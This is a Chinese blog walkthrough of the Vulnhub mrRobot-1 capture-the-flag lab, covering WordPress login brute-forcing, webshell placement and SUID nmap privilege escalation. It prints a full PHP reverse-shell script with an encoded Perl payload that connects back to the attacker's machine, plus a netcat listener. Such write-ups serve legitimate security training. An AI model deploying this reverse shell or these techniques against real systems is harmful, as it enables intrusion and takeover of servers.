mrRobot-1靶场_wp

最新推荐文章于 2024-05-11 11:36:26 发布
最新推荐文章于 2024-05-11 11:36:26 发布
阅读量348 收藏 2
点赞数 1
文章标签: linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shajianlong666/article/details/131174416
版权

1、主机发现

2、端口扫描

nmap -sT -sV -O -A -p- 192.168.0.29

22 closed

80 open

443 open

3、访问80、443

80

443

没什么有用的东西

4、扫一波网站目录

发现两个重要的东西

/robots.txt /wp-login.php

分别访问

/robots.txt

有两个文件

/wp-login.php

可以确定CMS是wordpress

5、访问robots.txt中的两个文件

fsocity.dic

是一个字典文件

key-1-of-3.txt

这是第一个flag

6、burpsuite爆破用户名和密码

根据刚刚得到的字典,尝试爆破

先爆破用户名

username:Elliot

再爆破密码

password:ER28-0652

7、getshell

法一(蚁剑连接):

进入后台写入一句话木马

蚁剑连接

http://192.168.0.29/wp-content/themes/twentyfifteen/404.php

法二(反弹shell):

ip是kali的机子

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.0.13";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

kali起一个监听

nc -nvlp 4444

浏览器访问

http://192.168.0.29/wordpress/wp-content/themes/twentyfifteen/404.php

上线

8、提权

上线的用户权限不足

/home目录下有个robot用户

/home/robot 目录下有第二个flag和一个存放md5加密的密码的文件

key-2-of-3.txt

权限不足,看来得先切换到robot用户

password.raw-md5

md5解密后:abcdefghijklmnopqrstuvwxyz

切换到robot用户,并访问第二个flag

利用 SUID提权(其它提权没有试)

find / -perm -4000 -type f -exec ls -la {} 2> /dev/null \;

使用nmap提权

nmap --interactive
nmap> !sh

找剩余的flag

find / -name "key*of*"

xxzjl
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
MrRobot-Logo-Project:重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目
03-06
机器人先生徽标项目 正在进行的工作-随时贡献自己的力量! 重新创建和收集“ Mr Robot”电视节目的虚构徽标作为矢量文件的项目 徽标: 免责声明 这是一个由粉丝制作的项目,与任何正式的机器人先生电视节目或美国...
mrRobot.ova
07-16
SHA256: 1B69E9D8139D27387ED0EED112146FA6277272D1622A789E3CFEFBC456ABFA4F
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 251
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
Aluxian_的博客
10-23 649
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)1.信息收集工具得使用2.CMS框架登入后 反弹shell3.nmap提权,md5解密🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
最全看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1,2024年最新软件测试开发应该了解的Binder原理
最新发布
2401_84563933的博客
05-11 377
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)
靶场练习第七天~vulnhub靶场之mrRobot
qq_57976347的博客
02-01 1531
靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3 一、主机发现 1.用ifconfig查看kali的ip,因为kali和靶机都开启了NAT模式,使用namp -sP 192.168.101.0/24探测靶机ip 二、信息收集 1.使用nmap扫描靶机 使用nmap -A 192.168.101.108 ,查看靶机开放的端口与服务。 2.使用dirb命令扫描靶机网站 用dirb命令扫描靶机网站,看看有没有隐藏的网址或者配置文件,具体使用方法:dirb http://192.16
vulnhub靶场,MR-ROBOT: 1
kukudeshuo的博客
12-16 782
vulnhub靶场,MR-ROBOT: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 攻击机:kali(192.168.109.128) 靶机:MR-ROBOT: 1(192.168.109.190) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:需要获取目标靶机的三个flag 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开
Vulnhub靶场渗透-mrRobot
paidx0
09-21 949
前言 靶机ip(192.168.110.133) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 漏洞挖掘 扫到的东西比较多,逐个看了一下,在robots.txt里找到第一个 flag,还发现一个字典 其次还找到 Wordpress的登录页 flag1 : 073403c8a58a1f80d943455fb30724b9 可以看看robots.txt里的字典内容,拿这个字典去爆破WordPress登录页 因为需要的时间比较长,就不再跑一边截图了,账号 elli
Radmin 3.5 Remote Control Software [MrRobot].rar_radmin_radmin 3
07-14
activator for radmin server 3.0
MinGW_3.4.5
05-17
1. **GCC(GNU Compiler Collection)**:这是MinGW的主要组成部分,提供了C、C++、Fortran、Objective-C等多种语言的编译器。在MinGW 3.4.5中,GCC可能包含了3.4.5版本的编译器,这个版本相比现代版本可能不支持...
MrRobot:您可能在计算机上拥有的最愚蠢的程序
05-03
警告:运行该程序很危险。...python MrRobot.py [--OPTIONS] input_directory python MrRobot.py [--OPTIONS] input_file OPTIONS: -h --help : Displays this message. -v --verbose : Enables verbose mode.
Mr.Robot靶机渗透
她叫常玉莹
08-27 1190
背景:主题来自黑客军团,强烈建议观看这部美剧。 因为在局域网内使用arp-scan扫描网段查看靶机ip地址 主机的ip为192.168.0.105 nmap扫描目标机器 开放了80端口,浏览器访问一下 像是ssh但是什么命令都执行不了… 习惯看下网站的robots文件,这个文件是防止爬虫的,可能存放着隐私文件 拼接到url看看是什么文件 像是一个字典文件,查看下key-1-of-3.txt md5看一下啥也没有… 使用nikto扫描一下,发现了一个wordpress登陆的后台 用wpsacn看看有哪
【甄选靶场】Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)
人间体佐菲的博客
09-24 860
Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)信息安全,网络安全,渗透测试
看完这篇教你玩转靶机 MR-ROBOT: 1
清唪的博客
03-27 5145
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 靶机下载: 官网:https://download.vulnhub.com/mrrobot/mrRobot.ovahttps://download.vulnhub.com/mrrobot/mrRobot.ova
VulnHub靶场之Bizarre Adventure: Mrr3b0t
A_dmin的博客
10-25 623
VulnHub靶场之Bizarre Adventure: Mrr3b0t 扫描IP以及端口: 访问80,一个模板网站,,,扫描目录: 不可描述的flag.txt.txt,去看看: 没找到,去看看administrator,尝试弱密码,登陆失败,没有用户名密码错误提升啥的: 继续寻找flag.txt.txt提示的hidden,,,再images中找到一个名叫hidden的图片: 去在线解密一下: 得到一个用户名mrrobot,需要进行暴力破解,,, 直接用bp抓包进行破解,这里我使用的是rocky
vulnhub靶场渗透mrrobot漏洞复现
qq_61702710的博客
07-27 759
此 VM 有三个密钥隐藏在不同的位置。你的目标是找到所有三个。每个钥匙都越来越难找到。 VM 并不太困难。没有任何高级利用或逆向工程。该级别被认为是初级 - 中级。
2.100个渗透测试实战#2(mrRobot
qwsn
03-20 2370
目录 一、实验环境 二、实验流程 三、实验步骤 (一)信息后随即——主机发现 1.查看kali的网卡和IP信息(网卡名:eth0;IP:192.168.97.129); 2.查看靶机页面; 3.探测主机的存活状态(netdiscover、arp-scan、nmap); 4.分析所得: (二)信息收集——端口(服务)扫描 1.扫描端口,以及端口对应的服务信息,以及靶机的操作系统信...
Mr-robot靶机练习详解
weixin_45597678的博客
07-09 482
下载靶机使用虚拟机打开,打靶目标获取三个key文件 靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/ 1.首先对局域网进行主机扫描,命令nmap 192.168.1.1/24,发现目标主机192.168.127.140打开端口有22、80、443 2.浏览网站查看情况,看到一个命令行的界面自动使用root用户登录但是用户可以使用的命令被限制了都是一些没什么用的命令,其他的命令全部不能使用 3.使用burp对目标网站进行目录爬虫发现在网站下面有一个r
2024年软件测试最新看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1(1),已获千赞
2401_84141304的博客
05-07 365
【代码】2024年软件测试最新看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot 1(1),已获千赞。
Mr.Robot靶机 - 机器人先生
Ms08067安全实验室
03-02 2198
本文作者:恩格尔-src小组﹀﹀﹀靶机简介:靶机主题来自美剧《黑客军团》,这是一部传达极客精神和黑客文化的上佳作品,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精神分裂,整部剧的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xxzjl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值